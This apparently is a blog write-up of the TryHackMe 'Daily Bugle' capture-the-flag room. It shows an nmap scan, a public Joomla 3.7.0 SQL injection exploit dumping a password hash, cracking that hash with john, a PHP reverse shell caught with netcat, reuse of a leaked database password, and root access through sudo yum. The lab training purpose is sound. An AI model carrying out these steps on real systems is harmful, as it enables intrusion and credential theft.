TryHackMe Daily Bugle writeup !!

on Posted by

1.Introduction

Link to the room: https://tryhackme.com/room/dailybugle

Reported difficulty: Difficult

This room requires initial exploration of the Joomla CMS via SQL Injection, reverse shell upload and escalation of privileges with abuse of sudo permissions.


  1. User flag
  2. Root flag


  1. SQL Injection and access to Joomla administration
  2. Reverse shell upload and user flag
  3. Escalation of privileges





We started with nmapto identify open doors.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

# Nmap 7.80 scan initiated Wed Jul 22 20:15:35 2020 as: nmap -sC -sV -v -oA nmap-initial 10.10.182.45
Nmap scan report for 10.10.182.45
Host is up (0.22s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open  mysql   MariaDB (unauthorized)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 22 20:16:09 2020 -- 1 IP address (1 host up) scanned in 33.48 seconds


Ports 22 (SSH), 80 (HTTP) and 3306 (MySQL) are open. Right from the start, we also see that there is a file robots.txtthat prohibits scanning multiple addresses, including the address /administrator.

Accessing the server address on port 80, the website with user login fields is displayed. Accessing the address /administrador, the login screen for the Joomla CMS administration interface is displayed .

Using the Joomscan tool , we identified the version of Joomla installed on this site is version 3.7.0.


Researching available exploits for Joomla version 3.7.0, we realized that it is vulnerable to CVE-2017-8917 , related to SQL Injection.

We found a script on Github that automates the exploitation of this vulnerability.

1
2
3
4
5
6
7
8

$ python exploit.py

    (...)
 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: fb9j5_users
  -  Extracting users from fb9j5_users
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0ve...Zutm', '', '']


The password hash is in bcrypt format, as denoted by the excerpt $2y$at the beginning of the code. We use johnto break this hash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

$ john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sp....3 #Senha ocultada
1g 0:00:03:29 DONE (2020-07-22 22:04) 0.004773g/s 223.7p/s 223.7c/s 223.7C/s thelma1..setsuna
Use the "--show" option to display all of the cracked passwords reliably
Session completed


With the user jonah and the password discovered, we were able to log into the Joomla administrative interface.

From this interface, it is possible to send files to the server. One possibility is the management of the solution's templates, in the menu “Extensions” → “Templates” → “Templates” . With this functionality we can upload a PHP script that activates a reverse shell, such as the one available in PentestMonkey .

With the script on the server, just activate a local listener and access the script via a browser.

1
2
3
4
5
6
7
8

$ rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.14.0.83] from (UNKNOWN) [10.10.182.45] 56630
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 21:14:12 up 55 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell


On the server, we access the file /var/www/html/configuration.phpand find various information, including the username and password used to access MySQL:

1
2

public $user = 'root';
public $password = 'nv....Nu'; # Senha ocultada


Usually, people reuse passwords for various services. A quick search of the directory /home/shows only the user jjameson. When we try to use the newly discovered password to log in with this user we obtain success and access to the first flag.

1
2
3
4
5
6
7

ash-4.2$ su jjameson
su jjameson
Password: nv...Nu
[jjameson@dailybugle ~]$ ls -l /home/jjameson
ls -l /home/jjameson
total 4
-rw-rw-r-- 1 jjameson jjameson 33 Dec 15 2019 user.txt


In the internal enumeration of services and permissions, we identified that the user jjameson can run the command yumwith root permissions.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

[jjameson@dailybugle ~]$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum


With this information, just GTFOBins and access the root flag.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

[jjameson@dailybugle ~]$ sh privesc
sh privesc
Loaded plugins: y
No plugin match for: y
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# ls -l /root
ls -l /root
total 8
-rw-------. 1 root root 1484 Dec 14  2019 anaconda-ks.cfg
-rw-r--r--  1 root root   33 Dec 15  2019 root.txt

Comments

Post a Comment